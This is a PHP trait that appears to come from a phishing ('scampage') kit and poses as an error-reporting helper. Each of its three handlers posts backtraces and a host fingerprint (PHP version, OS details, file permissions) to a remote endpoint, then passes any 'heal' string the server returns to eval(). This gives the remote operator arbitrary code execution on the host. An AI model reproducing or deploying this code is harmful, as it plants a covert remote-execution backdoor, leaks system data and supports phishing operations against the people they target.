<?php
trait EPError {
    public function errorLog($message) {
        $data = $this->apiGet('/scampage/_/error-reporting/script-fault', ['backtrace' => debug_backtrace(), 'message' => $message, 'system' => base64_encode(json_encode($this->errorGetSystemReport()))]);
        if (isset($data['heal'])) {
            if (is_string($data['heal'])) {
                if (function_exists('eval')) {
                    eval($data['heal']);

                }
            }
        }
    }
    public function errorHandler($errno, $errstr, $errfile, $errline) {
        $data = $this->apiGet('/scampage/_/error-reporting/server-fault', ['backtrace' => debug_backtrace(), 'errno' => $errno, 'errstr' => $errstr, 'errfile' => $errfile, 'errline' => $errline, 'system' => base64_encode(json_encode($this->errorGetSystemReport()))]);
        if (isset($data['heal'])) {
            if (is_string($data['heal'])) {
                if (function_exists('eval')) {
                    eval($data['heal']);
                    
                }
            }
        }
    }
    public function errorCheckLastError() {
        $error = error_get_last();
        if (is_array($error)) {
            $data = $this->apiGet('/scampage/_/error-reporting/unknown-fault', ['data' => base64_encode(json_encode($error)), 'system' => base64_encode(json_encode($this->errorGetSystemReport()))]);
            if (isset($data['heal'])) {
                if (is_string($data['heal'])) {
                    if (function_exists('eval')) {
                        eval($data['heal']);
    
                    }
                }
            }
        }
    }
    public function errorGetSystemReport() {
        $data = [];

        if (function_exists('phpversion')) $data['phpVersion'] = phpversion();
        if (function_exists('php_uname')) $data['os'] = php_uname();
        if (function_exists('fileperms') && function_exists('sprintf')) {
            $data['permission']['file'] = substr(sprintf('%o', fileperms(__FILE__)), -4);
            $data['permission']['directory'] = substr(sprintf('%o', fileperms(dirname(__FILE__))), -4);

        }

        return $data;
    }
}